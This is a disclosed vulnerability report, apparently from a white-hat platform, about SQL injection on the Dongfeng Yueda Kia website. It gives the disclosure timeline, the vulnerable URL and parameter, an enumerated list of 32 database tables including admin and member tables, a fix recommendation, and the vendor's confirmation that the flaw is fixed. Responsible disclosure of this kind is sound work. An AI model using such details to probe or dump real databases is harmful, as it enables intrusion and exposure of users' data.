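2014-11-03: Details reported to the vendor; awaiting vendor response
2014-11-07: Vendor confirmed; details disclosed to the vendor only
2014-11-17: Details disclosed to core white hats and experts in related fields
2014-11-27: Details disclosed to regular white hats
2014-12-07: Details disclosed to intern white hats
2014-12-18: Details disclosed to the public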
SQL injection on the Dongfeng Yueda Kia main site; multiple databases, can be dumped
Main site: http://www.dyk.com.cn/promotion/index?type=89
Current database, dyk_dyk:
Database: dyk_dyk
[32 tables]
+---------------------+
| ci_addonarticle     |
| ci_admin            |
| ci_admin_node       |
| ci_admin_role       |
| ci_arcatt           |
| ci_archives         |
| ci_arctiny          |
| ci_arctype          |
| ci_attachment       |
| ci_captcha          |
| ci_cartype          |
| ci_channeltype      |
| ci_citys            |
| ci_common_cache     |
| ci_log              |
| ci_login_log        |
| ci_member           |
| ci_member_car       |
| ci_member_msg       |
| ci_member_qq        |
| ci_member_sinaweibo |
| ci_menu             |
| ci_provinces        |
| ci_search           |
| ci_search_keyword   |
| ci_sendmsg_log      |
| ci_serviceplan      |
| ci_sessions         |
| ci_stepselect       |
| ci_sys_enum         |
| ci_sysconfig        |
| ci_table            |
+---------------------+
Admin accounts:
Filter input and add protection
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-11-07 17:58
Thanks, it has been fixed.
None yet